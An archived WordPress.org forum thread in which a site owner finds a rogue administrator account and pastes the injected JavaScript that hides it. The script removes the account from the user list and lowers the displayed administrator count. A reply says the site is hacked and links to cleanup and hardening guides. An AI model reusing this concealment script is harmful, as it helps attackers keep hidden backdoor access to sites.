WordPress.org

Forums

bug? gest can become an administrator (2 posts)

  1. matteoredaelli
    Member
    Posted 5 years ago #

    hello I found in my wp installation a new user AntonioBeasley63

    with role administrator
    and user field with ...

    ... <div id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>

  2. That's not a bug, you're installation is hacked.

    Give this a good read http://codex.wordpress.org/FAQ_My_site_was_hacked

    http://codex.wordpress.org/WordPress_Backups
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://codex.wordpress.org/Backing_Up_Your_Database

    You'll need to not only clean up the hack but also identify how the hack happened so you can prevent it from occurring again.

    Once that's done do this
    http://codex.wordpress.org/Hardening_WordPress

    Good luck.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.